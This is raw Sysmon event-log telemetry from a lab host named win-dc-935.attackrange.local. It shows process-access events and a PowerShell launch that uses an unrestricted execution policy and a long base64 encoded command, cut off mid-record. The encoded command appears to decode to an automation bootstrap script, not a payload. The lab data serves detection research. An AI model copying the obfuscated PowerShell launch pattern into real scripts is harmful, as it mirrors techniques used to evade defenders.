+51791 10341000x80000000000000005707Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005706Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005705Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005704Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005703Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005702Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005701Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005700Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005699Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005698Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005697Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005696Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005695Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005693Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-85A6-5FCF-F100-000000009101}41564172C:\Windows\system32\cmd.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005692Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.142{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQ